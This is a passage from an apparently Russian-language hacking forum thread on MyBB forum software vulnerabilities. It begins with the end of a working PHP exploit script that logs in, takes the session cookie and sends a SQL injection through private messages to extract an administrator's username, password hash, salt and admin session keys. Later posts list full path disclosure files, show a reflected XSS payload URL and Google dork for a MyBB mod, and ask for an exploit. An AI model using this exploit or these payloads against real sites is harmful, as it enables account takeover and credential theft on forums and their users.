    feof($url)) $s[] = fgets($url1028);
        
    fclose($url);
        return 
    $s;
    }

    echo 
    '<pre>- start....';
    myflush(50000);

    $get_cookie sendd($host_mybb$patch_mybb$login_mybb'POST'$data_login'fuckkk');
    echo 
    '<pre>- login '.$username.' with passwd = '.$pwd.' done';
    myflush(50000);

    foreach (
    $get_cookie as $value)
    {
        if (
    strpos($value'Set-Cookie: mybbuser=') !== false)
        {
            
    $value explode(";"$value);
            
    $cookie strstr($value[0], 'mybbuser');
            break;
        }
    }
    echo 
    '<pre>- cookie: '.$cookie;
    myflush(50000);

    preg_match("/mybbuser=(.*)_/"$cookie$m);
    $get_uid $m[1];
    echo 
    '<pre>- user id: '.$get_uid;
    myflush(50000);

    $data_expl "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
    sendd($host_mybb$patch_mybb$pm_mybb'POST'$data_expl$cookie);
    echo 
    '<pre>- send exploit:
    -------------------
    '
    .$send_http.'
    -------------------
    look you private messages 4 admin passwd hash <a href=http://'
    .$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
    }


    ?>

    </body>
    </html>
     
    _________________________
    3 people like this.
  16. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Full path disclosure MyBB 1.4.x

    Code:
    /admin/modules/config/smilies.php
    /inc/class_custommoderation.php
    /inc/3rdparty/diff/Diff3.php
    /inc/3rdparty/diff/Diff/Renderer/inline.php
    /inc/3rdparty/diff/Diff/Renderer/unified.php
    /inc/tasks/massmail.php
    
     
  17. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    MyBB (FWS Mod) reflected XSS

    Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814)

    Vulnerable piece of code:
    Code:
    //USERCP AND PM CHANGES 
    elseif($file == "usercp.php" || $file == "private.php") 
    { 
     if(function_exists("imagecreatefrompng") && $mybb->user['fws_warnings'] != 0) 
     { 
      if($mybb->user['fws_warnings'] <= 14 && $mybb->user['fws_warnings'] > 0) $addition = " ".fws_warning_colour($mybb->user['fws_warnings'].
    "%"); 
      $fws_current_w_level = '<img src="fws.php?action=image&wl='.$mybb-
    >user['fws_warnings'].'" alt="'.$mybb->user['fws_warnings'].'%" title="'.$mybb->user['fws_warnings'].'%" border="0" />'.$addition; 
     } 
     
    Example: http://mybboard.it/forum/fws.php?action=image&wl=/\<sCRIPT>alert("xss")</sCRIPT>\

    Google dork: inurl:fws.php; "MyBB" inurl:fws.php

    http://securityvulns.ru/Vdocument379.html
     
    _________________________
  18. SEKTOR3A

    SEKTOR3A New Member

    Joined:
    2 May 2009
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    xss

    прив всем ,нашел на mybb2.ru xss вот записал видео http://narod.ru/disk/8621473000/xss_forum_mybb2.rar.html ,плз подскажите какой-нить сплоит к нему

    xss
    href="viewtopic.php?t=1529&amp;start=0&amp;postdays=0&amp;postorder=asc&amp;highlight="
     
    #19 SEKTOR3A, 18 May 2009
    Last edited: 18 May 2009
  19. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    MyBB 1.4.6 3 May 2009

    Доступ Админка

    Уязвимость существует из-за недостаточной обработки входных данных в URL

    xss можно засунуть в Категории & Форума

    Решение:http://mybboard.it/forum/thread-3623.html
     
    #20 Nelzone, 25 May 2009
    Last edited: 2 Jul 2009
    2 people like this.